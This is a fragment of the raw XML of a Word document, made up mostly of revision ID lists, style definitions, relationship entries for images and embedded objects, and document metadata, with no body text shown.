    <w:rsid w:val="263C68E5"/>
    <w:rsid w:val="263E265D"/>
    <w:rsid w:val="2641214D"/>
    <w:rsid w:val="267947AD"/>
    <w:rsid w:val="267C7548"/>
    <w:rsid w:val="26B31CD8"/>
    <w:rsid w:val="26E96B7F"/>
    <w:rsid w:val="27126B44"/>
    <w:rsid w:val="27BA089A"/>
    <w:rsid w:val="27C42665"/>
    <w:rsid w:val="27C5560C"/>
    <w:rsid w:val="27C75FF1"/>
    <w:rsid w:val="27EB05C2"/>
    <w:rsid w:val="280D5AD7"/>
    <w:rsid w:val="284B2D3E"/>
    <w:rsid w:val="28577A06"/>
    <w:rsid w:val="28731593"/>
    <w:rsid w:val="288547F0"/>
    <w:rsid w:val="289347A7"/>
    <w:rsid w:val="28E72801"/>
    <w:rsid w:val="291F30DE"/>
    <w:rsid w:val="29203FE3"/>
    <w:rsid w:val="2926783B"/>
    <w:rsid w:val="29604833"/>
    <w:rsid w:val="29853A5E"/>
    <w:rsid w:val="298B652C"/>
    <w:rsid w:val="29920292"/>
    <w:rsid w:val="29A63E25"/>
    <w:rsid w:val="29AE7AF9"/>
    <w:rsid w:val="29B36FE6"/>
    <w:rsid w:val="29BB3FC4"/>
    <w:rsid w:val="2A2C7B80"/>
    <w:rsid w:val="2A311D33"/>
    <w:rsid w:val="2A5B264A"/>
    <w:rsid w:val="2A5C5636"/>
    <w:rsid w:val="2A5F1B8B"/>
    <w:rsid w:val="2A606EBB"/>
    <w:rsid w:val="2A6B6528"/>
    <w:rsid w:val="2AA01C58"/>
    <w:rsid w:val="2AC1360A"/>
    <w:rsid w:val="2AC1385C"/>
    <w:rsid w:val="2AC179D5"/>
    <w:rsid w:val="2AD4574E"/>
    <w:rsid w:val="2B16407E"/>
    <w:rsid w:val="2B16585B"/>
    <w:rsid w:val="2B261594"/>
    <w:rsid w:val="2B434780"/>
    <w:rsid w:val="2BA14AC6"/>
    <w:rsid w:val="2BD77C54"/>
    <w:rsid w:val="2BEF7575"/>
    <w:rsid w:val="2C31106C"/>
    <w:rsid w:val="2C4E1120"/>
    <w:rsid w:val="2C55425C"/>
    <w:rsid w:val="2CB00CDF"/>
    <w:rsid w:val="2D0A14EA"/>
    <w:rsid w:val="2D2D6E21"/>
    <w:rsid w:val="2D2F3C20"/>
    <w:rsid w:val="2D3C0E45"/>
    <w:rsid w:val="2D555A93"/>
    <w:rsid w:val="2D974C47"/>
    <w:rsid w:val="2D9A5FA4"/>
    <w:rsid w:val="2D9C251C"/>
    <w:rsid w:val="2DA32882"/>
    <w:rsid w:val="2E0C0155"/>
    <w:rsid w:val="2E1C39FD"/>
    <w:rsid w:val="2E5E4F02"/>
    <w:rsid w:val="2E9F2F97"/>
    <w:rsid w:val="2EB62725"/>
    <w:rsid w:val="2ED839E0"/>
    <w:rsid w:val="2EE163AD"/>
    <w:rsid w:val="2EF645A1"/>
    <w:rsid w:val="2F0816B9"/>
    <w:rsid w:val="2F1C004F"/>
    <w:rsid w:val="2F4D7616"/>
    <w:rsid w:val="2F5C1B66"/>
    <w:rsid w:val="2F6038E1"/>
    <w:rsid w:val="2F7A0ED5"/>
    <w:rsid w:val="2FA95AE3"/>
    <w:rsid w:val="30152B12"/>
    <w:rsid w:val="302B5483"/>
    <w:rsid w:val="303E4FB3"/>
    <w:rsid w:val="3066521B"/>
    <w:rsid w:val="306803E2"/>
    <w:rsid w:val="308D56F1"/>
    <w:rsid w:val="3097733C"/>
    <w:rsid w:val="30E57CC9"/>
    <w:rsid w:val="30F87185"/>
    <w:rsid w:val="310D50AC"/>
    <w:rsid w:val="314350F7"/>
    <w:rsid w:val="3153761B"/>
    <w:rsid w:val="31633FC8"/>
    <w:rsid w:val="316F7144"/>
    <w:rsid w:val="317E045D"/>
    <w:rsid w:val="317E61DA"/>
    <w:rsid w:val="31962090"/>
    <w:rsid w:val="31A95877"/>
    <w:rsid w:val="31B51138"/>
    <w:rsid w:val="31B545E7"/>
    <w:rsid w:val="31C0661C"/>
    <w:rsid w:val="32684121"/>
    <w:rsid w:val="32717248"/>
    <w:rsid w:val="32790DF5"/>
    <w:rsid w:val="327A6399"/>
    <w:rsid w:val="328758AA"/>
    <w:rsid w:val="3288072E"/>
    <w:rsid w:val="32AC1F19"/>
    <w:rsid w:val="332331A5"/>
    <w:rsid w:val="340457DA"/>
    <w:rsid w:val="34113123"/>
    <w:rsid w:val="34265D7F"/>
    <w:rsid w:val="343731D9"/>
    <w:rsid w:val="343C7988"/>
    <w:rsid w:val="344341AB"/>
    <w:rsid w:val="347344B0"/>
    <w:rsid w:val="34A7571D"/>
    <w:rsid w:val="34C87697"/>
    <w:rsid w:val="34EB0FED"/>
    <w:rsid w:val="34F351A9"/>
    <w:rsid w:val="350D015C"/>
    <w:rsid w:val="352B46F4"/>
    <w:rsid w:val="35536025"/>
    <w:rsid w:val="36101AA6"/>
    <w:rsid w:val="361D63A6"/>
    <w:rsid w:val="36245F64"/>
    <w:rsid w:val="36271EA7"/>
    <w:rsid w:val="369E2489"/>
    <w:rsid w:val="36B35215"/>
    <w:rsid w:val="36D952EB"/>
    <w:rsid w:val="36FC12FD"/>
    <w:rsid w:val="370D525A"/>
    <w:rsid w:val="37177092"/>
    <w:rsid w:val="375815A3"/>
    <w:rsid w:val="37772EB5"/>
    <w:rsid w:val="37B81AC6"/>
    <w:rsid w:val="37F05F31"/>
    <w:rsid w:val="381F5D4D"/>
    <w:rsid w:val="38295CCA"/>
    <w:rsid w:val="3867153E"/>
    <w:rsid w:val="386E4340"/>
    <w:rsid w:val="388F6D25"/>
    <w:rsid w:val="38946061"/>
    <w:rsid w:val="38AB3A4B"/>
    <w:rsid w:val="38B82CA0"/>
    <w:rsid w:val="38DF22C7"/>
    <w:rsid w:val="38EF22C3"/>
    <w:rsid w:val="392842A9"/>
    <w:rsid w:val="393F49A1"/>
    <w:rsid w:val="39551D3F"/>
    <w:rsid w:val="395A0729"/>
    <w:rsid w:val="397E5FE3"/>
    <w:rsid w:val="399B34CA"/>
    <w:rsid w:val="3A0C36D3"/>
    <w:rsid w:val="3A8B1791"/>
    <w:rsid w:val="3A8F4317"/>
    <w:rsid w:val="3AB021D7"/>
    <w:rsid w:val="3ABE6250"/>
    <w:rsid w:val="3AC73557"/>
    <w:rsid w:val="3AFF784F"/>
    <w:rsid w:val="3B446CC8"/>
    <w:rsid w:val="3B574C33"/>
    <w:rsid w:val="3B90705F"/>
    <w:rsid w:val="3BEF0936"/>
    <w:rsid w:val="3C2C6090"/>
    <w:rsid w:val="3C430575"/>
    <w:rsid w:val="3C564BA6"/>
    <w:rsid w:val="3C6A7F57"/>
    <w:rsid w:val="3C7C0FCD"/>
    <w:rsid w:val="3C931288"/>
    <w:rsid w:val="3D0C0B0B"/>
    <w:rsid w:val="3D7B741A"/>
    <w:rsid w:val="3D7D2741"/>
    <w:rsid w:val="3E6764C5"/>
    <w:rsid w:val="3ECE5514"/>
    <w:rsid w:val="3EDA070C"/>
    <w:rsid w:val="3EDF0565"/>
    <w:rsid w:val="3F0264C5"/>
    <w:rsid w:val="3F03223E"/>
    <w:rsid w:val="3F227977"/>
    <w:rsid w:val="3F7F10DC"/>
    <w:rsid w:val="3FA56E51"/>
    <w:rsid w:val="3FFD4EDF"/>
    <w:rsid w:val="4006345A"/>
    <w:rsid w:val="402F0601"/>
    <w:rsid w:val="408F7457"/>
    <w:rsid w:val="40933A8B"/>
    <w:rsid w:val="40D62817"/>
    <w:rsid w:val="40DF6392"/>
    <w:rsid w:val="40F77D1B"/>
    <w:rsid w:val="416D2F21"/>
    <w:rsid w:val="41CE2F41"/>
    <w:rsid w:val="41FE425C"/>
    <w:rsid w:val="421C797B"/>
    <w:rsid w:val="42B86394"/>
    <w:rsid w:val="42E6744A"/>
    <w:rsid w:val="42F50667"/>
    <w:rsid w:val="43064506"/>
    <w:rsid w:val="432B3B11"/>
    <w:rsid w:val="43537FF8"/>
    <w:rsid w:val="436E5EB8"/>
    <w:rsid w:val="439134E8"/>
    <w:rsid w:val="43A96494"/>
    <w:rsid w:val="43AD6D43"/>
    <w:rsid w:val="43B6162D"/>
    <w:rsid w:val="43BA09F3"/>
    <w:rsid w:val="443F621B"/>
    <w:rsid w:val="445A2900"/>
    <w:rsid w:val="44806705"/>
    <w:rsid w:val="448674E8"/>
    <w:rsid w:val="448E0268"/>
    <w:rsid w:val="45280E97"/>
    <w:rsid w:val="458945BC"/>
    <w:rsid w:val="45975239"/>
    <w:rsid w:val="463D4287"/>
    <w:rsid w:val="46514EFE"/>
    <w:rsid w:val="46535EF2"/>
    <w:rsid w:val="46A80BCA"/>
    <w:rsid w:val="46F86597"/>
    <w:rsid w:val="472B0583"/>
    <w:rsid w:val="47365648"/>
    <w:rsid w:val="486407C1"/>
    <w:rsid w:val="488E3A3D"/>
    <w:rsid w:val="48920E52"/>
    <w:rsid w:val="48A92A1D"/>
    <w:rsid w:val="48C77A88"/>
    <w:rsid w:val="48C9519A"/>
    <w:rsid w:val="48EB1D78"/>
    <w:rsid w:val="48EE6CB6"/>
    <w:rsid w:val="49357A90"/>
    <w:rsid w:val="49AD1007"/>
    <w:rsid w:val="49B20650"/>
    <w:rsid w:val="49B22896"/>
    <w:rsid w:val="49C419AF"/>
    <w:rsid w:val="49C90D1F"/>
    <w:rsid w:val="4AD16190"/>
    <w:rsid w:val="4B1D52EC"/>
    <w:rsid w:val="4B2127AC"/>
    <w:rsid w:val="4B316836"/>
    <w:rsid w:val="4B4733C1"/>
    <w:rsid w:val="4B473D7B"/>
    <w:rsid w:val="4B9B047E"/>
    <w:rsid w:val="4BA94FC4"/>
    <w:rsid w:val="4C3A6574"/>
    <w:rsid w:val="4C6C174D"/>
    <w:rsid w:val="4CBC68E1"/>
    <w:rsid w:val="4CC77CC0"/>
    <w:rsid w:val="4CE74FE6"/>
    <w:rsid w:val="4D466A7E"/>
    <w:rsid w:val="4D752DA5"/>
    <w:rsid w:val="4D967BFF"/>
    <w:rsid w:val="4DB240FA"/>
    <w:rsid w:val="4E3221F7"/>
    <w:rsid w:val="4EB017F5"/>
    <w:rsid w:val="4F1C4276"/>
    <w:rsid w:val="4F4274F0"/>
    <w:rsid w:val="4F531D47"/>
    <w:rsid w:val="4F5733FF"/>
    <w:rsid w:val="4F7C25C8"/>
    <w:rsid w:val="4F7D22DE"/>
    <w:rsid w:val="4FB6433F"/>
    <w:rsid w:val="4FF82E08"/>
    <w:rsid w:val="500C43B6"/>
    <w:rsid w:val="50120955"/>
    <w:rsid w:val="50596486"/>
    <w:rsid w:val="50854DFD"/>
    <w:rsid w:val="509C1BAA"/>
    <w:rsid w:val="50A46306"/>
    <w:rsid w:val="50D56D05"/>
    <w:rsid w:val="50D94FD9"/>
    <w:rsid w:val="50E61F63"/>
    <w:rsid w:val="510F6820"/>
    <w:rsid w:val="51324759"/>
    <w:rsid w:val="5139590F"/>
    <w:rsid w:val="51A04E60"/>
    <w:rsid w:val="51C75DA3"/>
    <w:rsid w:val="51F84394"/>
    <w:rsid w:val="52541547"/>
    <w:rsid w:val="52A17752"/>
    <w:rsid w:val="52C76924"/>
    <w:rsid w:val="52D06ACA"/>
    <w:rsid w:val="534949A7"/>
    <w:rsid w:val="53685287"/>
    <w:rsid w:val="538C05FC"/>
    <w:rsid w:val="53A2777C"/>
    <w:rsid w:val="53AC2E08"/>
    <w:rsid w:val="53C42347"/>
    <w:rsid w:val="54221A86"/>
    <w:rsid w:val="542B6A7C"/>
    <w:rsid w:val="544A7DCD"/>
    <w:rsid w:val="545F4B4A"/>
    <w:rsid w:val="5480129B"/>
    <w:rsid w:val="5496234B"/>
    <w:rsid w:val="54D1518C"/>
    <w:rsid w:val="55924389"/>
    <w:rsid w:val="55AF0C6A"/>
    <w:rsid w:val="55D343BA"/>
    <w:rsid w:val="55E40C52"/>
    <w:rsid w:val="55F07EB9"/>
    <w:rsid w:val="56680EAC"/>
    <w:rsid w:val="56D239CA"/>
    <w:rsid w:val="57866378"/>
    <w:rsid w:val="5818698A"/>
    <w:rsid w:val="58483941"/>
    <w:rsid w:val="584D30DB"/>
    <w:rsid w:val="58A4109F"/>
    <w:rsid w:val="58BC12CC"/>
    <w:rsid w:val="58BE1257"/>
    <w:rsid w:val="58FC6EB5"/>
    <w:rsid w:val="592F526C"/>
    <w:rsid w:val="598E77FC"/>
    <w:rsid w:val="59941FB8"/>
    <w:rsid w:val="59A276AD"/>
    <w:rsid w:val="59C32AE3"/>
    <w:rsid w:val="59C95E83"/>
    <w:rsid w:val="59D80589"/>
    <w:rsid w:val="5A0E2379"/>
    <w:rsid w:val="5A2B3BA5"/>
    <w:rsid w:val="5AF854CA"/>
    <w:rsid w:val="5AF932A3"/>
    <w:rsid w:val="5B01091D"/>
    <w:rsid w:val="5B310D26"/>
    <w:rsid w:val="5B6D0D13"/>
    <w:rsid w:val="5BD20B76"/>
    <w:rsid w:val="5C110361"/>
    <w:rsid w:val="5C6307FC"/>
    <w:rsid w:val="5CC260D6"/>
    <w:rsid w:val="5D1F1257"/>
    <w:rsid w:val="5D4B2C61"/>
    <w:rsid w:val="5DA81573"/>
    <w:rsid w:val="5DBA47BF"/>
    <w:rsid w:val="5DCD14F0"/>
    <w:rsid w:val="5DDF0F9C"/>
    <w:rsid w:val="5DEE28DF"/>
    <w:rsid w:val="5E3927FB"/>
    <w:rsid w:val="5E4A4B5E"/>
    <w:rsid w:val="5E677D1F"/>
    <w:rsid w:val="5EA44B93"/>
    <w:rsid w:val="5F0A577B"/>
    <w:rsid w:val="5F0D5D04"/>
    <w:rsid w:val="5F116AF9"/>
    <w:rsid w:val="5F1E585D"/>
    <w:rsid w:val="5F5F3CC9"/>
    <w:rsid w:val="5F7C0767"/>
    <w:rsid w:val="60536302"/>
    <w:rsid w:val="6056593C"/>
    <w:rsid w:val="60B251CF"/>
    <w:rsid w:val="60B61030"/>
    <w:rsid w:val="60C43183"/>
    <w:rsid w:val="60E21390"/>
    <w:rsid w:val="60FE5CC9"/>
    <w:rsid w:val="610405E7"/>
    <w:rsid w:val="61683167"/>
    <w:rsid w:val="61BB168C"/>
    <w:rsid w:val="61CB32AE"/>
    <w:rsid w:val="61D10FFA"/>
    <w:rsid w:val="61F65F96"/>
    <w:rsid w:val="62156CD8"/>
    <w:rsid w:val="62175CE1"/>
    <w:rsid w:val="622073FA"/>
    <w:rsid w:val="62403299"/>
    <w:rsid w:val="624A5CB4"/>
    <w:rsid w:val="6257598B"/>
    <w:rsid w:val="627C50F9"/>
    <w:rsid w:val="62906CA8"/>
    <w:rsid w:val="62EA059C"/>
    <w:rsid w:val="62ED51EE"/>
    <w:rsid w:val="63326A6E"/>
    <w:rsid w:val="63636F83"/>
    <w:rsid w:val="6377539F"/>
    <w:rsid w:val="63883847"/>
    <w:rsid w:val="63AB062A"/>
    <w:rsid w:val="63C90AB0"/>
    <w:rsid w:val="63EE3535"/>
    <w:rsid w:val="63F21DB5"/>
    <w:rsid w:val="64243F39"/>
    <w:rsid w:val="64840167"/>
    <w:rsid w:val="64864E63"/>
    <w:rsid w:val="648E4076"/>
    <w:rsid w:val="64D8363C"/>
    <w:rsid w:val="64DC2D27"/>
    <w:rsid w:val="64F21E0A"/>
    <w:rsid w:val="655B409B"/>
    <w:rsid w:val="65687576"/>
    <w:rsid w:val="656B6191"/>
    <w:rsid w:val="657D7DA4"/>
    <w:rsid w:val="658F2FCB"/>
    <w:rsid w:val="65975942"/>
    <w:rsid w:val="65BE7AF0"/>
    <w:rsid w:val="65C67642"/>
    <w:rsid w:val="65E84B80"/>
    <w:rsid w:val="65EF4974"/>
    <w:rsid w:val="664A1B6B"/>
    <w:rsid w:val="66565FB4"/>
    <w:rsid w:val="666C6DE2"/>
    <w:rsid w:val="66DE7394"/>
    <w:rsid w:val="66E84AFD"/>
    <w:rsid w:val="66EC0A19"/>
    <w:rsid w:val="67211863"/>
    <w:rsid w:val="675F417A"/>
    <w:rsid w:val="67980A2A"/>
    <w:rsid w:val="685C11E9"/>
    <w:rsid w:val="68A12279"/>
    <w:rsid w:val="68EA1347"/>
    <w:rsid w:val="68FE78A7"/>
    <w:rsid w:val="69A12DA1"/>
    <w:rsid w:val="6A2B2667"/>
    <w:rsid w:val="6A503532"/>
    <w:rsid w:val="6A6A4BA6"/>
    <w:rsid w:val="6A741A6B"/>
    <w:rsid w:val="6B2C02A3"/>
    <w:rsid w:val="6B410D6F"/>
    <w:rsid w:val="6B630C29"/>
    <w:rsid w:val="6BBF08AC"/>
    <w:rsid w:val="6BFF5988"/>
    <w:rsid w:val="6C296B07"/>
    <w:rsid w:val="6C3D3B00"/>
    <w:rsid w:val="6C470E1E"/>
    <w:rsid w:val="6C8B72C4"/>
    <w:rsid w:val="6CA20AE1"/>
    <w:rsid w:val="6CAA2F58"/>
    <w:rsid w:val="6D0A3F43"/>
    <w:rsid w:val="6D12370E"/>
    <w:rsid w:val="6D893ADE"/>
    <w:rsid w:val="6DA34847"/>
    <w:rsid w:val="6DC26BA7"/>
    <w:rsid w:val="6DC8278C"/>
    <w:rsid w:val="6DD41238"/>
    <w:rsid w:val="6E1574D0"/>
    <w:rsid w:val="6E4E6782"/>
    <w:rsid w:val="6E6E0A4C"/>
    <w:rsid w:val="6E745711"/>
    <w:rsid w:val="6E8E36E5"/>
    <w:rsid w:val="6F3052F0"/>
    <w:rsid w:val="6F704F9D"/>
    <w:rsid w:val="6F74656A"/>
    <w:rsid w:val="6F8C273F"/>
    <w:rsid w:val="6FFA00CF"/>
    <w:rsid w:val="700674F2"/>
    <w:rsid w:val="700C06A3"/>
    <w:rsid w:val="701A2DBF"/>
    <w:rsid w:val="70B669A6"/>
    <w:rsid w:val="713211F5"/>
    <w:rsid w:val="71692C8E"/>
    <w:rsid w:val="71B336C3"/>
    <w:rsid w:val="71BC0116"/>
    <w:rsid w:val="71C27838"/>
    <w:rsid w:val="71CB64A6"/>
    <w:rsid w:val="71E07AE6"/>
    <w:rsid w:val="71FB5066"/>
    <w:rsid w:val="72141A90"/>
    <w:rsid w:val="721614C8"/>
    <w:rsid w:val="721A015C"/>
    <w:rsid w:val="723A1032"/>
    <w:rsid w:val="7261073B"/>
    <w:rsid w:val="72654242"/>
    <w:rsid w:val="72F60DE9"/>
    <w:rsid w:val="73001628"/>
    <w:rsid w:val="73850D0C"/>
    <w:rsid w:val="73DD2CAA"/>
    <w:rsid w:val="74022B34"/>
    <w:rsid w:val="74070338"/>
    <w:rsid w:val="74212243"/>
    <w:rsid w:val="744F3E92"/>
    <w:rsid w:val="746F4DC3"/>
    <w:rsid w:val="74B02129"/>
    <w:rsid w:val="74FD59F0"/>
    <w:rsid w:val="75282933"/>
    <w:rsid w:val="752C54A3"/>
    <w:rsid w:val="75443DAA"/>
    <w:rsid w:val="754A769E"/>
    <w:rsid w:val="75681E19"/>
    <w:rsid w:val="75A80A13"/>
    <w:rsid w:val="75DC3633"/>
    <w:rsid w:val="75F93AE4"/>
    <w:rsid w:val="7653178B"/>
    <w:rsid w:val="765A47CD"/>
    <w:rsid w:val="76692DC4"/>
    <w:rsid w:val="76A61B2E"/>
    <w:rsid w:val="76AA5525"/>
    <w:rsid w:val="76C9366A"/>
    <w:rsid w:val="77461D32"/>
    <w:rsid w:val="77FF76BB"/>
    <w:rsid w:val="780E314F"/>
    <w:rsid w:val="781246A1"/>
    <w:rsid w:val="784C7ED4"/>
    <w:rsid w:val="78C3486C"/>
    <w:rsid w:val="78EE0F9E"/>
    <w:rsid w:val="78FF3476"/>
    <w:rsid w:val="79430580"/>
    <w:rsid w:val="795E0774"/>
    <w:rsid w:val="79685109"/>
    <w:rsid w:val="7989605C"/>
    <w:rsid w:val="79B0209F"/>
    <w:rsid w:val="7A081773"/>
    <w:rsid w:val="7A65148B"/>
    <w:rsid w:val="7A737ACF"/>
    <w:rsid w:val="7ABD110F"/>
    <w:rsid w:val="7AC91B56"/>
    <w:rsid w:val="7AFB1C44"/>
    <w:rsid w:val="7B052AC1"/>
    <w:rsid w:val="7B2F56FF"/>
    <w:rsid w:val="7B3F5B73"/>
    <w:rsid w:val="7B6B4388"/>
    <w:rsid w:val="7C006433"/>
    <w:rsid w:val="7C181E38"/>
    <w:rsid w:val="7C4055DE"/>
    <w:rsid w:val="7C6B1866"/>
    <w:rsid w:val="7C7D7B93"/>
    <w:rsid w:val="7D316CC8"/>
    <w:rsid w:val="7D4C0957"/>
    <w:rsid w:val="7D686B8E"/>
    <w:rsid w:val="7D6F401F"/>
    <w:rsid w:val="7DA27DFB"/>
    <w:rsid w:val="7DC6571B"/>
    <w:rsid w:val="7E155908"/>
    <w:rsid w:val="7E911A84"/>
    <w:rsid w:val="7EBC6F52"/>
    <w:rsid w:val="7ECB6BE7"/>
    <w:rsid w:val="7EF52A6E"/>
    <w:rsid w:val="7F6556D9"/>
    <w:rsid w:val="7F9B10FB"/>
    <w:rsid w:val="7FA808A3"/>
    <w:rsid w:val="7FA8450A"/>
    <w:rsid w:val="7FBA0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Lines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0" w:line="400" w:lineRule="exact"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:kern w:val="44"/>
      <w:sz w:val="28"/>
      <w:szCs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Lines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0" w:line="400" w:lineRule="exact"/>
      <w:ind w:left="575" w:hanging="575"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:sz w:val="24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Lines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0" w:line="400" w:lineRule="exact"/>
      <w:ind w:left="567" w:hanging="567"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii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400" w:lineRule="exact"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:szCs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Lines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0" w:line="400" w:lineRule="exact"/>
      <w:ind w:left="1009" w:hanging="1009"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体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1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21">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="1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5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1680" w:leftChars="800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4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1260" w:leftChars="600"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1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20">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="1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Strong"/>
    <w:basedOn w:val="21"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="23">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="2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9.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.emf"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.emf"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin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emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.emf"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin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7.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.emf"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin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4158</Words>
  <Characters>15912</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>6</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17788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2022-07-09T11:27:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>果果个网子</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-08T03:44:50Z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F22AF99B003E47AD84360654BD3AE08A</vt:lpwstr>
  </property>
</Properties>
</file>